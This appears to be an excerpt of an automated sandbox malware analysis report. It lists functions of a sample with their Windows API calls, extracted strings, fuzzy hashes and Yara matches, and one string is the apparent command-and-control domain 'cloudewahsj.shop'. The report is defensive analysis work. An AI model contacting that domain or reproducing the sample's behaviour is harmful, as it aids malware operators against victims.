Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 136ff0709e28839b269720e4fb839b7b46befae130c92130e2f97ddf8959a9d5
Instruction ID: d294dc39abdefed7299eeb113bd94dd65164e84cb7974bfe8d228d73c8c27ee3
Opcode Fuzzy Hash: 136ff0709e28839b269720e4fb839b7b46befae130c92130e2f97ddf8959a9d5
Instruction Fuzzy Hash: 1911D0792593018BD308CF55DC9136BFBE3ABC6348F19C92DE18557355CAB8C106CB5A

Function 020D003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 020D024D

Strings

kernel32.dll, xrefs: 020D008F, 020D0095
cess, xrefs: 020D018D

Memory Dump Source

Source File: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20d0000_628E.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: dca78506bd68bbaebe83f703c92878055dae886c6e97be66cdc185833bc2fdca
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 62525A74A01229DFDB64CF58C984BACBBB1BF09314F1480D9E94DAB351DB30AA95DF14

Function 020A07A6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 020A07CE
Module32First.KERNEL32(00000000,00000224), ref: 020A07EE

Memory Dump Source

Source File: 00000003.00000002.1736228708.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20a0000_628E.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 8d659c7b413419b2f988576143d97f6a89123ddc3dc83f07f48dd86c176834ea
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 20F0F6319003196FE7203BF5D89CB6F76E9BF49625F500128E643910C0DB70E8059E60

Function 004423C5 Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 004423C5
GetForegroundWindow.USER32 ref: 004423E0

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: ea1af17a4c87661e7e22aa3b412247517447923eaeb0832990aa116f906f78b1
Instruction ID: 3f5cde6939bccaa2b971e6e0c262a6c41a2af89a1d69f81b939c4d59ebd80ce7
Opcode Fuzzy Hash: ea1af17a4c87661e7e22aa3b412247517447923eaeb0832990aa116f906f78b1
Instruction Fuzzy Hash: D3D0A7BDD114104BB2559720BC0E45F36119B9B20A304443CE4070121BEA35118E868E

Function 020D0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,020D0223,?,?), ref: 020D0E19
SetErrorMode.KERNELBASE(00000000,?,?,020D0223,?,?), ref: 020D0E1E

Memory Dump Source

Source File: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20d0000_628E.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 6694f36606793361b509c331fc2bc32e2ccd64f7af50ad39e78bfb29505a1a99
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 87D0123114522877D7412AA4DC09BCD7B5CDF05B66F008011FB0DD9080C770954046E9

Function 0040D400 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0040D413

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: b103da860b07b6caeef7231849386c8b9813f2fcc2fc8537c1924e67a92246bd
Instruction ID: 5b8c1c1c38bc235c753b9088e917c06d101502a7d4806eff28edba5b46e46085
Opcode Fuzzy Hash: b103da860b07b6caeef7231849386c8b9813f2fcc2fc8537c1924e67a92246bd
Instruction Fuzzy Hash: 32D05E7565014477D2146B18EC47F563658970375AF000229F663C65D1D910A915E569

Function 0040D433 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040D445

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 08574d9084c9b59a9be89533cd06f00eba31ac9089c6781083e346e8ebf9aaa5
Instruction ID: f87055a7ed73e73a39e7b0bf2bc1a884afc0d8708234b3b1202e7b1dbc502a37
Opcode Fuzzy Hash: 08574d9084c9b59a9be89533cd06f00eba31ac9089c6781083e346e8ebf9aaa5
Instruction Fuzzy Hash: 52D0C9787D8305B7F6685B18EC17F1632505306F61F340229B366FF6D0C9D07901961C

Function 004404E2 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 004404FD

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: ffaa9ae7a0f019c742f1804f8799764577334675712f88277fcdd572fe457cd5
Instruction ID: e6622cb3e0fd9e941ff1a23b217b6006838c210e8ccdd082eec4ddb73310e109
Opcode Fuzzy Hash: ffaa9ae7a0f019c742f1804f8799764577334675712f88277fcdd572fe457cd5
Instruction Fuzzy Hash: 4AC08C31504922EBC7102F28BC16BC63A14EF02762F0748B1F000A90B5C728EC91C9D8

Function 004404B0 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,00000001,00408C27,FDFCE302), ref: 004404C0

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1b7010b4c8090af6c82bcce16cf64795d3be7dfa4a7c6d6e8218ea40ee4cb554
Instruction ID: a3e7d273c8645b615fb13e0d68042f64d6ea605513032f2b713a79b74872f641
Opcode Fuzzy Hash: 1b7010b4c8090af6c82bcce16cf64795d3be7dfa4a7c6d6e8218ea40ee4cb554
Instruction Fuzzy Hash: CFC04871045220ABDA502B25EC09BCA3A68AF46662F0280A6B044A70B2C760AC82CA98

Function 020A0465 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 020A04B6

Memory Dump Source

Source File: 00000003.00000002.1736228708.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20a0000_628E.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: bdc41ccda184dcb8944b69ff46fb398ea0e0b7b47c1004dea63479c10d35ad1d
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 3D113C79A40208EFDB01DF98C985E98BBF5AF08750F058094F9489B361D371EA50EF80

Non-executed Functions

Function 0210D337 Relevance: 27.2, APIs: 8, Strings: 7, Instructions: 957memorycomCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(80838290,00000000,00000001,?,00000000), ref: 0210D7D9
SysAllocString.OLEAUT32 ref: 0210D86F
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0210D8AD
SysAllocString.OLEAUT32 ref: 0210D90F
SysAllocString.OLEAUT32 ref: 0210D9CC
VariantInit.OLEAUT32(?), ref: 0210DA3D
SysFreeString.OLEAUT32(00000000), ref: 0210DDC4

Strings

fF, xrefs: 0210D837
{pqv, xrefs: 0210D387
tu, xrefs: 0210D813
CfF, xrefs: 0210D867
[J, xrefs: 0210D484
yv, xrefs: 0210DA7A
[B, xrefs: 0210D48C

Memory Dump Source

Source File: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20d0000_628E.jbxd

Yara matches

Similarity

API ID: String$Alloc$BlanketCreateFreeInitInstanceProxyVariant
String ID: fF$CfF$[B$[J$tu$yv${pqv
API String ID: 2895375541-1972840126
Opcode ID: bdaff328534dd5683dbd10ee3d6b6dc991919c11ec2b92dd5ed535f15564d12e
Instruction ID: 2eae990534a00fbe987fed5415118b083f4821f285b2c52f9919823feb8cd508
Opcode Fuzzy Hash: bdaff328534dd5683dbd10ee3d6b6dc991919c11ec2b92dd5ed535f15564d12e
Instruction Fuzzy Hash: 976213726583508FE324CF68D89176BBBE1EF85314F15892CE5D58B3D0D7B99809CB82

Function 0041618C Relevance: 16.0, Strings: 12, Instructions: 1044COMMON

Download Yara Rule

Strings

fjM, xrefs: 00416B0D
y~, xrefs: 00416283
{, xrefs: 00416299
pSlM, xrefs: 00416406
yx, xrefs: 0041628E
YjM, xrefs: 00416B56
6, xrefs: 00416C5B
EnA, xrefs: 00416E3F
fjM, xrefs: 00416BB3
YjM, xrefs: 00416BF6
HJK, xrefs: 004165CD, 0041662B, 00416685, 004166CF, 00416744, 0041682D, 004169FA, 00416A43, 00416D22, 00416D9B
6y, xrefs: 00416278

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID:
String ID: 6$6y$EnA$HJK$YjM$YjM$fjM$fjM$pSlM$yx$y~${
API String ID: 0-1007820471
Opcode ID: bcc76d1abf98286d77b35e6a0b09e71a8baff3536dadb212a893043a5b643fc1
Instruction ID: a2001c8a8adb2b8dbf3dd01cda6d968c98786edfc2a21b29c8f54ffb17cc71b7
Opcode Fuzzy Hash: bcc76d1abf98286d77b35e6a0b09e71a8baff3536dadb212a893043a5b643fc1
Instruction Fuzzy Hash: 9762E3741083418FE724CF25C891BAB77E1FF86314F15496DE0D69B2A2D738D84ACB9A

Function 0042A7F0 Relevance: 11.1, APIs: 2, Strings: 4, Instructions: 573COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 0042A8F7
RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 0042A9CF

Strings

q, xrefs: 0042ADA6
*, xrefs: 0042AB95, 0042AA60, 0042AA93
HJK, xrefs: 0042AF20
*, xrefs: 0042AC00

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: *$*$HJK$q
API String ID: 237503144-1274243159
Opcode ID: 5f672a718d274909524f70c82779d112448254364d71578b31479b925a6e829e
Instruction ID: 6a2a75fc59155a11c5aec0aea031f7e0da65668b1aff7312ce30b4a80edc4f4b
Opcode Fuzzy Hash: 5f672a718d274909524f70c82779d112448254364d71578b31479b925a6e829e
Instruction Fuzzy Hash: 130212B56083158FD724CF28D89135FB7E1FFC5308F05892DE9999B291DB78890ACB86

Function 020DE3D5 Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 345COMMON

Download Yara Rule

APIs

CoUninitialize.COMBASE ref: 020DE3E1

Strings

Zb, xrefs: 020DE3EF
RYZ[, xrefs: 020DE795
cloudewahsj.shop, xrefs: 020DE898
c[i!, xrefs: 020DE532
UGC9, xrefs: 020DE548
yD, xrefs: 020DE501

Memory Dump Source

Source File: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20d0000_628E.jbxd

Yara matches

Similarity

API ID: Uninitialize
String ID: RYZ[$UGC9$Zb$c[i!$cloudewahsj.shop$yD
API String ID: 3861434553-1392773931
Opcode ID: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
Instruction ID: 50cb193d9fc6d2e9655c6f7c25522fe10b7489cf8eb4e7a7e9398a11a51f23a3
Opcode Fuzzy Hash: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
Instruction Fuzzy Hash: 55C1207150D3C08BDB35CF24C8687ABBBE1AFD2304F08496CD4D95B286D778450ACBA6

Function 0040E16E Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 345COMMON

Download Yara Rule

APIs

CoUninitialize.OLE32 ref: 0040E17A

Strings

UGC9, xrefs: 0040E2E1
cloudewahsj.shop, xrefs: 0040E631
RYZ[, xrefs: 0040E52E
Zb, xrefs: 0040E188
yD, xrefs: 0040E29A
c[i!, xrefs: 0040E2CB

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID: Uninitialize
String ID: RYZ[$UGC9$Zb$c[i!$cloudewahsj.shop$yD
API String ID: 3861434553-1392773931
Opcode ID: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
Instruction ID: 966cdb19ca8ac249a37a340b6d4c56d028db331cb6ce3dd003334f0be9ec8841
Opcode Fuzzy Hash: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
Instruction Fuzzy Hash: C3C1FF7150C3D08BDB348F2598687ABBBE1AFD2304F084D6DD8D95B286D678450A8B96

Function 020DB4E7 Relevance: 10.4, Strings: 8, Instructions: 384COMMON

Download Yara Rule

Strings

S;G%, xrefs: 020DB642
SV, xrefs: 020DB8D6
UGEA, xrefs: 020DB4F9
)Ku, xrefs: 020DB6A2
ox}k, xrefs: 020DB919, 020DB90D, 020DB9A9, 020DB9D3, 020DB8FC, 020DB80B, 020DB9A0, 020DB7B7, 020DB98C
c[G, xrefs: 020DB522
x[G, xrefs: 020DB5B7
DM_e, xrefs: 020DB5C9, 020DB77A

Memory Dump Source

Source File: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20d0000_628E.jbxd

Yara matches

Similarity

API ID:
String ID: )Ku$DM_e$S;G%$SV$UGEA$c[G$ox}k$x[G
API String ID: 0-3323421312
Opcode ID: 6c2c288b3743fe4fbd1b2963644c860e42ee050d0cc4828e002f03bb987ef718
Instruction ID: e69a2cf43c390fbbdd4fc637564cc10970b8f30b14bd34f1d37b2c829c59f69d
Opcode Fuzzy Hash: 6c2c288b3743fe4fbd1b2963644c860e42ee050d0cc4828e002f03bb987ef718
Instruction Fuzzy Hash: 7AD1F27150D3808BD725CF29889436FFBE2AFC160CF1A892CE4E55B349D776850ADB86

Function 0040B280 Relevance: 10.4, Strings: 8, Instructions: 384COMMON

Download Yara Rule

Strings

c[G, xrefs: 0040B2BB
DM_e, xrefs: 0040B362, 0040B513
x[G, xrefs: 0040B350
)Ku, xrefs: 0040B43B
ox}k, xrefs: 0040B5A4, 0040B695, 0040B739, 0040B6A6, 0040B742, 0040B725, 0040B550, 0040B76C, 0040B6B2
SV, xrefs: 0040B66F
S;G%, xrefs: 0040B3DB
UGEA, xrefs: 0040B292

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID:
String ID: )Ku$DM_e$S;G%$SV$UGEA$c[G$ox}k$x[G
API String ID: 0-3323421312
Opcode ID: 955f6e51a34149f4c10f413aa8795b1a1dd05340e96898ae9af78c9a06cf57c5
Instruction ID: 7fd46061e40033794bbc6c3ce90a1e611a10dbdcf815d020572bc93dee4dedaf
Opcode Fuzzy Hash: 955f6e51a34149f4c10f413aa8795b1a1dd05340e96898ae9af78c9a06cf57c5
Instruction Fuzzy Hash: 55D1F57150C3408BD724CF29845476BFBE2EFD1708F18896DE4D56B385D77A890A8B8B

Function 020D95C7 Relevance: 10.3, Strings: 8, Instructions: 272COMMON

Download Yara Rule

Strings

ID, xrefs: 020D9649
eMOK, xrefs: 020D9657
|xzy, xrefs: 020D969F
Y, xrefs: 020D9745
ADTD, xrefs: 020D968F
E, xrefs: 020D95EF
vu, xrefs: 020D973E
vxtq, xrefs: 020D96A7

Memory Dump Source

Source File: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20d0000_628E.jbxd

Yara matches

Similarity

API ID:
String ID: ADTD$E$ID$Y$eMOK$vu$vxtq$|xzy
API String ID: 0-1466227541
Opcode ID: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
Instruction ID: 2d47eafb8935b0b06afe5a8eb744e6024973220de91ae1ccd98e88d5a6726077
Opcode Fuzzy Hash: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
Instruction Fuzzy Hash: 7171F23158D3D68AD3128F7AC4A076BFFE0AF92354F1C496CE4D48B291D3798109EB56

Function 00409360 Relevance: 10.3, Strings: 8, Instructions: 272COMMON

Download Yara Rule

Strings

ID, xrefs: 004093E2
|xzy, xrefs: 00409438
ADTD, xrefs: 00409428
vu, xrefs: 004094D7
Y, xrefs: 004094DE
E, xrefs: 00409388
vxtq, xrefs: 00409440
eMOK, xrefs: 004093F0

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID:
String ID: ADTD$E$ID$Y$eMOK$vu$vxtq$|xzy
API String ID: 0-1466227541
Opcode ID: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
Instruction ID: 68c016febbe7a0715404e25fe2d2c1f5bf377f828986e49a58439a2b7b357855
Opcode Fuzzy Hash: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
Instruction Fuzzy Hash: 7871E23158C3928AD3118F7AC4A076BFFE09FA2350F1C496DE4D45B392D37989099B9A

Function 00419B30 Relevance: 9.7, APIs: 2, Strings: 3, Instructions: 947COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 00419FF7
FreeLibrary.KERNEL32(?), ref: 0041A039

Part of subcall function 00442080: LdrInitializeThunk.NTDLL(0044523A,00000002,00000018,?,?,00000018,?,?,?), ref: 004420AE

Strings

mj, xrefs: 00419F08
HJK, xrefs: 00419B55, 00419BF7, 00419C50, 00419D41, 00419F6C, 00419FA6, 0041A010, 0041A04E, 0041A0D4, 0041A174, 0041A22E, 0041A28D, 0041A329, 0041A3D2, 0041A4F9, 0041A67D, 0041A6FD
Wu, xrefs: 00419FF7, 0041A039

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: HJK$mj$Wu
API String ID: 764372645-337365752
Opcode ID: c086cc875a9495cf51c40eac8dc5e50a76db1f680bda795562031d64835a4f2b
Instruction ID: e4b45be28fd4c7cbff433e2c06fe463db16693d42f5f124cafcdabba2620905a
Opcode Fuzzy Hash: c086cc875a9495cf51c40eac8dc5e50a76db1f680bda795562031d64835a4f2b
Instruction Fuzzy Hash: D76223746093009FE724CF25CC507ABBBE2BB85318F24861EE594573A1E7399C96CB4B

Function 020E7DFA Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 243COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 020E80D7

Strings

WH, xrefs: 020E7FD5
TW, xrefs: 020E7FDD
}&'$, xrefs: 020E7E3E
7, xrefs: 020E7FE5

Memory Dump Source

Source File: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20d0000_628E.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: 7$TW$WH$}&'$
API String ID: 237503144-3022637246
Opcode ID: f2589dec76ca3da30d2202253f81892e3db71206ab5a992931fad51fe054197f
Instruction ID: ee50367b2212058117bfbf4d506f8a248cf382b712fe6586ff1a730f4199298c
Opcode Fuzzy Hash: f2589dec76ca3da30d2202253f81892e3db71206ab5a992931fad51fe054197f
Instruction Fuzzy Hash: 8191E275A083528BC714CF28C89036BBBE2FFD9354F288A1CE4C64B765E7748985DB52

Function 020D8CC7 Relevance: 7.7, APIs: 5, Instructions: 216threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 020D8CEB
GetCurrentThreadId.KERNEL32 ref: 020D8CF5
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 020D8DDD
GetForegroundWindow.USER32 ref: 020D8DF2
ExitProcess.KERNEL32 ref: 020D8F6E

Memory Dump Source

Source File: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20d0000_628E.jbxd

Yara matches

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: b5f0f8089672b5e80aed31e02240edf92ffda114601a99c10a6afc8ae68805cc
Instruction ID: b70ca7900eac1d71088ad4326fad948813b6be263bc4559a675954f04c9c93c9
Opcode Fuzzy Hash: b5f0f8089672b5e80aed31e02240edf92ffda114601a99c10a6afc8ae68805cc
Instruction Fuzzy Hash: F7618773B143140FD318AE79DC063AAB6D39BC5720F0FC63D9985EB790EA7888068785

Function 00427FC0 Relevance: 6.7, Strings: 5, Instructions: 431COMMON

Download Yara Rule

Strings

vC, xrefs: 00428162
HJK, xrefs: 0042850D, 004285A0
up, xrefs: 00428157
#C}, xrefs: 00428438
@-, xrefs: 0042814C

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID:
String ID: #C}$@-$HJK$up$vC
API String ID: 0-1413266920
Opcode ID: fe4f9d4565ffa40ec65875b6bd9e8bbb556a4c85dd3c3c1a3913f1bfe2a2c7a4
Instruction ID: 145fb0a50be3e303ead08e2671ce65b3aa3df702a645c1f6ac8533401e1fa356
Opcode Fuzzy Hash: fe4f9d4565ffa40ec65875b6bd9e8bbb556a4c85dd3c3c1a3913f1bfe2a2c7a4
Instruction Fuzzy Hash: 9FE1EBB5209340DFE324DF25E88076FBBE1FB86304F54882EE5898B251DB35D945CB9A

Function 020DC2E7 Relevance: 6.4, Strings: 5, Instructions: 104COMMON

Download Yara Rule

Strings

Js, xrefs: 020DC328
'!, xrefs: 020DC380
50, xrefs: 020DC414
DM_e, xrefs: 020DC2EA
FwPq, xrefs: 020DC320

Memory Dump Source

Source File: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_20d0000_628E.jbxd

Yara matches

Similarity

API ID:
String ID: 50$DM_e$FwPq$Js$'!
API String ID: 0-1711485358
Opcode ID: c4c1f8e28e835abe653d42ead9130a3bdb40cd1f355abcf11e9a7fb6b3c4c5b3
Instruction ID: 78c3dab6ffe4f3d6d08021daa9abf500a7cad071fcc8ef9c4498ca686b9783ab
Opcode Fuzzy Hash: c4c1f8e28e835abe653d42ead9130a3bdb40cd1f355abcf11e9a7fb6b3c4c5b3
Instruction Fuzzy Hash: F551DAB45493808FE338CF25C991B8BBBB1BBA1304F609A0CE6D95B254CB759446CF97

Function 00425713 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 346COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 00425743

Strings

67, xrefs: 00425B0C

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 67
API String ID: 237503144-1886922373
Opcode ID: e3d5ee6a10ef3cb590ca084e24df21bec85322a84b333c3760c72d733834ca72
Instruction ID: 69054aec17b57e4c885244c43c85c7a2a523591f4f2f134b8c84ae4bc1ca1ac0
Opcode Fuzzy Hash: e3d5ee6a10ef3cb590ca084e24df21bec85322a84b333c3760c72d733834ca72
Instruction Fuzzy Hash: 6EB1A9B4508710CBD7109F54E88176BBBE0FF86708F44496EE9849B391E7B9C949CB8B

Function 00425DA0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00425E98
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00425F24

Strings

23, xrefs: 00425E1F

Memory Dump Source

Source File: 00000003.00000002.1730552359.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1730552359.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_628E.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 23
API String ID: 237503144-326707096
